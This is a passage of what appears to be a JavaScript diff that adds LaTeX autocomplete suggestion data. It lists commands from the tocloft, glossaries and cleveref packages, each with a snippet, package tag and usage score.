'\\cftafterlottitle', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\newlistof{}{}{}', + snippet: '\\newlistof{$1}{$2}{$3}', + meta: 'tocloft-cmd', + score: 0.0005381264966408724, + }, + ], + glossaries: [ + { + caption: '\\glslongpluralkey', + snippet: '\\glslongpluralkey', + meta: 'glossaries-cmd', + score: 1.4538687447297259e-5, + }, + { + caption: '\\Glspl{}', + snippet: '\\Glspl{$1}', + meta: 'glossaries-cmd', + score: 0.0025291265119320736, + }, + { + caption: '\\glossarysection', + snippet: '\\glossarysection', + meta: 'glossaries-cmd', + score: 9.579755294730752e-5, + }, + { + caption: '\\printglossaries', + snippet: '\\printglossaries', + meta: 'glossaries-cmd', + score: 0.0010106582768889887, + }, + { + caption: '\\Gls{}', + snippet: '\\Gls{$1}', + meta: 'glossaries-cmd', + score: 0.003696678698317109, + }, + { + caption: '\\setglossarystyle{}', + snippet: '\\setglossarystyle{$1}', + meta: 'glossaries-cmd', + score: 0.0003758893277679221, + }, + { + caption: '\\printglossary', + snippet: '\\printglossary', + meta: 'glossaries-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\printglossary[]', + snippet: '\\printglossary[$1]', + meta: 'glossaries-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\setglossarysection{}', + snippet: '\\setglossarysection{$1}', + meta: 'glossaries-cmd', + score: 3.6081414102781514e-5, + }, + { + caption: '\\glsresetall', + snippet: '\\glsresetall', + meta: 'glossaries-cmd', + score: 0.0006123462672467326, + }, + { + caption: '\\the', + snippet: '\\the', + meta: 'glossaries-cmd', + score: 0.007238960303946444, + }, + { + caption: '\\acrshort{}', + snippet: '\\acrshort{$1}', + meta: 'glossaries-cmd', + score: 0.009936841864059727, + }, + { + caption: '\\printnoidxglossary[]', + snippet: '\\printnoidxglossary[$1]', + meta: 'glossaries-cmd', + score: 0.00021912375285685037, + }, + { + caption: '\\newglossary{}{}', + snippet: '\\newglossary{$1}{$2}', + meta: 'glossaries-cmd', + score: 1.4547244650032571e-5, + }, + { + caption: '\\gls{}', + snippet: '\\gls{$1}', + meta: 'glossaries-cmd', + score: 0.06939353309055077, + }, + { + caption: '\\printnoidxglossaries', + snippet: '\\printnoidxglossaries', + meta: 'glossaries-cmd', + score: 5.6789564226023136e-5, + }, + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'glossaries-cmd', + score: 0.004417016910870522, + }, + { + caption: '\\defglsentryfmt[]{}', + snippet: '\\defglsentryfmt[$1]{$2}', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glspostdescription', + snippet: '\\glspostdescription', + meta: 'glossaries-cmd', + score: 0.0006337376579591112, + }, + { + caption: '\\number', + snippet: '\\number', + meta: 'glossaries-cmd', + score: 0.000968714260809983, + }, + { + caption: '\\glsaddall', + snippet: '\\glsaddall', + meta: 'glossaries-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\glsaddall[]', + snippet: '\\glsaddall[$1]', + meta: 'glossaries-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\makeglossaries', + snippet: '\\makeglossaries', + meta: 'glossaries-cmd', + score: 0.0056737600836936995, + }, + { + caption: '\\glossaryname', + snippet: '\\glossaryname', + meta: 'glossaries-cmd', + score: 0.0006174536302752427, + }, + { + caption: '\\newglossaryentry{}{}', + snippet: '\\newglossaryentry{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.018524394136900962, + }, + { + caption: '\\glslabel', + snippet: '\\glslabel', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glsadd{}', + snippet: '\\glsadd{$1}', + meta: 'glossaries-cmd', + score: 3.0150373480213892e-5, + }, + { + caption: '\\makenoidxglossaries', + snippet: '\\makenoidxglossaries', + meta: 'glossaries-cmd', + score: 0.0001382210125680805, + }, + { + caption: '\\glsgenentryfmt', + snippet: '\\glsgenentryfmt', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acronymtype', + snippet: '\\acronymtype', + meta: 'glossaries-cmd', + score: 0.002000834271117562, + }, + { + caption: '\\acrfull{}', + snippet: '\\acrfull{$1}', + meta: 'glossaries-cmd', + score: 0.0032622587277765067, + }, + { + caption: '\\newacronym{}{}{}', + snippet: '\\newacronym{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.03193935544723102, + }, + { + caption: '\\glspl{}', + snippet: '\\glspl{$1}', + meta: 'glossaries-cmd', + score: 0.0034025897522047717, + }, + { + caption: '\\ifglsused{}{}{}', + snippet: '\\ifglsused{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acrlong{}', + snippet: '\\acrlong{$1}', + meta: 'glossaries-cmd', + score: 0.002517821598213752, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'glossaries-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'glossaries-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'glossaries-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'glossaries-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'glossaries-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'glossaries-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'glossaries-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'glossaries-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'glossaries-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'glossaries-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'glossaries-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'glossaries-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'glossaries-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'glossaries-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'glossaries-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'glossaries-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'glossaries-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'glossaries-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'glossaries-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'glossaries-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'glossaries-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'glossaries-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'glossaries-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'glossaries-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'glossaries-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'glossaries-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'glossaries-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'glossaries-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'glossaries-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'glossaries-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'glossaries-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'glossaries-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'glossaries-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'glossaries-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'glossaries-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'glossaries-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'glossaries-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'glossaries-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'glossaries-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'glossaries-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'glossaries-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'glossaries-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'glossaries-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'glossaries-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'glossaries-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'glossaries-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'glossaries-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'glossaries-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'glossaries-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'glossaries-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'glossaries-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'glossaries-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'glossaries-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'glossaries-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'glossaries-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'glossaries-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'glossaries-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'glossaries-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'glossaries-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'glossaries-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'glossaries-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'glossaries-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'glossaries-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'glossaries-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'glossaries-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'glossaries-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'glossaries-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'glossaries-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'glossaries-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'glossaries-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'glossaries-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'glossaries-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'glossaries-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'glossaries-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'glossaries-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'glossaries-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'glossaries-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'glossaries-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'glossaries-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'glossaries-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'glossaries-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'glossaries-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'glossaries-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'glossaries-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'glossaries-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'glossaries-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'glossaries-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'glossaries-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'glossaries-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'glossaries-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'glossaries-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'glossaries-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'glossaries-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'glossaries-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'glossaries-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'glossaries-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'glossaries-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'glossaries-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'glossaries-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'glossaries-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'glossaries-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'glossaries-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'glossaries-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'glossaries-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'glossaries-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'glossaries-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'glossaries-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'glossaries-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'glossaries-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'glossaries-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'glossaries-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'glossaries-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'glossaries-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'glossaries-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'glossaries-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'glossaries-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'glossaries-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'glossaries-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'glossaries-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'glossaries-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'glossaries-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'glossaries-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'glossaries-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'glossaries-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'glossaries-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'glossaries-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'glossaries-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'glossaries-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'glossaries-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'glossaries-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'glossaries-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'glossaries-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'glossaries-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'glossaries-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'glossaries-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'glossaries-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'glossaries-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'glossaries-cmd', + score: 2.341195220791228, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'glossaries-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'glossaries-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'glossaries-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'glossaries-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'glossaries-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'glossaries-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'glossaries-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'glossaries-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'glossaries-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'glossaries-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'glossaries-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'glossaries-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'glossaries-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'glossaries-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'glossaries-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'glossaries-cmd', + score: 0.0063276692758974925, + }, + ], + cleveref: [ + { + caption: '\\crefdefaultlabelformat{}', + snippet: '\\crefdefaultlabelformat{$1}', + meta: 'cleveref-cmd', + score: 8.401009062000455e-6, + }, + { + caption: '\\crefname{}{}{}', + snippet: '\\crefname{$1}{$2}{$3}', + meta: 'cleveref-cmd', + score: 0.0016963440482621792, + }, + { + caption: '\\crefrangeformat{}{}', + snippet: '\\crefrangeformat{$1}{$2}', + meta: 'cleveref-cmd', + score: 0.00021116765384691477, + }, + { + caption: 